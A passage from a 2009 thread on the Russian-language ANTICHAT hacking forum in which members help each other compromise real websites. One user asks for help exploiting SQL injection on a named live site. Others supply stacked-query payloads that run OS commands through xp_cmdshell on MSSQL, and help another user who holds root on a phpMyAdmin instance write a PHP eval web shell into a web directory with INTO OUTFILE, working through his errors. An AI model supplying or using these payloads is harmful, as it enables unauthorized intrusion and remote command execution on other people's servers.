ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #9251  
Старый 06.10.2009, 19:53
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763

Репутация: 1680


Отправить сообщение для Nightmarе с помощью ICQ
По умолчанию

Цитата:
Сообщение от Ctacok  
И так
Твой запрос приводит к ошибке.
Error pulling cat information from database: (SELECT cat_na as cat, maincat FROM cfaq_cats WHERE catid = 24) Unknown column 'cat_na' in 'field list'
Т.е. intval() нету, что неплохо.
Зато просто ограничение в 2 символа
Если хочешь, крути скулю в лимит 2 символа
Конечно хочу, просто покажи пожалуйста как версию вывести, а дальше уж я сам своё чёрное дело сделаю.
 

  #9252  
Старый 06.10.2009, 20:00
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763

Репутация: 1680


Отправить сообщение для Nightmarе с помощью ICQ
По умолчанию

Упс, не заметил по этому поводу демократию, извиняюсь. Всё понял, как бы SQL, но в тоже время и не SQL вовсе =)))
Пасиба. Обломился празник ;(
 

  #9253  
Старый 07.10.2009, 21:47
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763

Репутация: 1680


Отправить сообщение для Nightmarе с помощью ICQ
По умолчанию

Слышал, что через SQL в базе данных MSSql реально выполнить cmd команды, но дел с этой БД никогда не имел, если это не миф, то просьба, показать на этом примере:
sagiv.co.il/main.asp?cat=site&sel_nav1=1+or+1=@@version—
Или объясните плз, при каком условии можно выполнить cmd команду на сервере.
 

  #9254  
Старый 07.10.2009, 22:29
Ch3ck
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021

Репутация: 1879


По умолчанию

www.site.ru/index.asp?user=1'; exec master..xp_cmdshell 'CMD COMMAD HERE' --
 

  #9255  
Старый 07.10.2009, 22:55
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Цитата:
Сообщение от Nightmarе  
Слышал, что через SQL в базе данных MSSql реально выполнить cmd команды, но дел с этой БД никогда не имел, если это не миф, то просьба, показать на этом примере:
sagiv.co.il/main.asp?cat=site&sel_nav1=1+or+1=@@version—
Или объясните плз, при каком условии можно выполнить cmd команду на сервере.
Преимуществом этой СУБД есть то, что в скулях можно закрывать один запрос ( и выполненять другой... Поясню: Если есть уязвимый код, н.п.:
PHP код:
mssql_query('SELECT * FROM news WHERE id='.$_GET['id'].); 
При подставке в id, н.п. 1, запрос в БД будет выглядеть так:
Код:
SELECT * FROM news WHERE id=1
Это понятно Но можно сделать так:
Код:
?id=1; exec master..xp_cmdshell 'здесь комманда консоли винды'
тогда первый запрос будет
Код:
SELECT * FROM news WHERE id=1
второй:
Код:
exec master..xp_cmdshell 'здесь комманда консоли винды'
Про "exec", "master..xp_cmdshell" почитай в гугле

PS: Но exec не всегда разрешен. В большинстве случаев - только при пользователе "su" (это как root в MySQL)

Последний раз редактировалось mailbrush; 07.10.2009 в 23:03..
 

  #9256  
Старый 08.10.2009, 06:55
krypt3r
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186

Репутация: 905


По умолчанию

Пользователь sa =)
Nightmare - https://forum.antichat.ru/thread30501-mssql.html

Последний раз редактировалось krypt3r; 08.10.2009 в 07:03..
 

  #9257  
Старый 08.10.2009, 09:39
Shadrin
Постоянный
Регистрация: 20.08.2008
Сообщений: 348
Провел на форуме:
2200171

Репутация: 270
Отправить сообщение для Shadrin с помощью ICQ
По умолчанию

Всем привет,такая проблема:
Есть рут от пхпадмина phpMyAdmin 2.6.2-Debian,
Выполняю запрос:
Код:
select '<?php eval($_GET[e]); ?>' into outfile '/var/www/new/pma/1.php'
получаю

Код:
SQL-запрос: Документация

SELECT '&lt;?php eval($_GET[e]); ?&gt;'
INTO OUTFILE '/var/www/new/pma/1.php'

Ответ MySQL: Документация
#1064 - You have an error in your SQL syntax.  Check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
пути правельные из пхпинфо взял.
Зарание спасибо

Последний раз редактировалось Shadrin; 08.10.2009 в 09:50..
 

  #9258  
Старый 08.10.2009, 09:52
krypt3r
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186

Репутация: 905


По умолчанию

Попробуйте
Код:
SELECT ... FROM sometable INTO OUTFILE ...
где sometable - имя существующей таблицы
 

  #9259  
Старый 08.10.2009, 10:33
Shadrin
Постоянный
Регистрация: 20.08.2008
Сообщений: 348
Провел на форуме:
2200171

Репутация: 270
Отправить сообщение для Shadrin с помощью ICQ
По умолчанию

krypt3r спасибо уже что то ,
Код:
 SQL-запрос: Документация

SELECT '&lt;?php eval($_GET[e]); ?&gt;'
FROM db
INTO OUTFILE '/var/www/osiatis_new/landesk/ll.php'

Ответ MySQL: Документация
#1 - Can't create/write to file '/var/www/new/11/ll.php' (Errcode: 13)
все равно каким то боком кавычки мешают(

jokester
выполняю запросы в поле
Выполнить SQL запрос(ы) на БД
UPD можешь ради интереса попробовать вот так:
вылетает
Код:
#1064 - You have an error in your SQL syntax.  Check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
И проверил пользователя
root ALL PRIVILEGES

К примеру отбросим фильтр кавычек ,и смтря на первую ошибку получается что запись невозможна?

Последний раз редактировалось Shadrin; 08.10.2009 в 10:46..
 

  #9260  
Старый 08.10.2009, 10:39
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Shadrin
Хех, это я протупил, krypt3r прав, у тебя база просто 4, я неподумал. Теперь просто ошибка записи в папку. тоесть прав нет попросту Ищи папку на запись.

Последний раз редактировалось jokester; 08.10.2009 в 11:00..
 
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ